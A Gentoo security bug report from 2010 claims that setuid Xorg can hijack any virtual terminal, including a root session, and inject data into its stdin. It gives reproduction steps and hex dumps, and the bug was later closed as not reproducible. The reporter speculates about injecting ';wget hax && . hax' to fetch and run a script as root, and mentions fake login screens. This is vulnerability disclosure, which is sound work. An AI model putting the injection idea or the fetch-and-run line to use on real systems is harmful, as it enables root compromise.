Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 308159 - Xorg from x11-base/xorg-server-1.6.5-r1 can take over any VT
Summary: Xorg from x11-base/xorg-server-1.6.5-r1 can take over any VT
Status: RESOLVED INVALID
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Auditing (show other bugs)
Hardware: AMD64 Linux
: High major (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2010-03-07 07:08 UTC by Longpoke
Modified: 2016-02-17 12:52 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Longpoke 2010-03-07 07:08:45 UTC 
Xorg can take over any VT it wants... including one with a current root session. Additionally, arbitrary data is sent to stdin on the target VT.

Steps to reproduce:
1) On vt1 login as root and run "cat > test <<EOF"
2) On vt2 login as any user and run "Xorg vt1"
3) observe that you can no longer do anything on the root session on vt1 because it's been hijacked
4) kill Xorg
5) Return to vt1 and press enter, then type "EOF", then press enter
6) run "xxd test" and observe garbage data in it

I did this a few times and got this garbage:

$ xxd /tmp/test
0000000: 979c 2e64 2f78 6d65 a09d 2073 746f 700a  ...d/xme.. stop.

hmm, I have a file called /etc/init.d/me, and was running the commands "/etc/init.d/xme start" and "/etc/init.d/xme stop" before... but these were ran in vt1 in the context of the reproduction steps. Maybe the user on vt2 has some control over this data source, in which case, he can just spam this data source with ";wget hax && . hax\n" then run "Xorg vt1"...

$ xxd /tmp/test2
0000000: 9791 a323 9e94 9c30 b026 a623 9ea3 9c38  ...#...0.&.#...8
0000010: 3838 3838 3838 383c bcb8 38bc 3c0a       8888888<..8.<.
$ xxd /tmp/test3
0000000: 9c38 3cbc b838 3838 3838 3838 3838 3838  .8<..88888888888
0000010: 3838 383c bcbb 3cbc 3bbb 9db8 3cbc 9db8  888<..<.;...<...
0000020: 3b0a                                     ;.
$ xxd /tmp/test4
0000000: a39c 239f 9293 a386 8485 889c 8588 8685  ..#.............
0000010: 9c9c 3cbc 9db8 0a                        ..<....

Consequences:
1) Any user can block out any VT with a blank Xorg
2) Any user can put a fake login screen on any VT
3) Any user can cause arbitrary data to be sent to stdin of any VT, so if the target VT is running bash, that data may be executed as a bash command. I'm not sure if there is any way to control the arbitrary data.

Why does Xorg even have the vt option if it's setuid? Is there some way to control which vt's it can use? Encase you're wondering, you can also take over existing X displays, in which case the two displays are superimposed into one image, it's weird... I'll try and get a picture with a camera later because scrot just takes a picture of what the session *should* look like.
Comment 1 Paweł Hajdan, Jr. (RETIRED) gentoo-dev 2011-01-10 12:34:36 UTC 
X11 Team, could you advise?
Comment 2 Aaron Bauman (RETIRED) gentoo-dev 2016-02-17 12:52:31 UTC 
Cannot reproduce in current versions.  Bug is also outdated.  Please reopen if you disagree.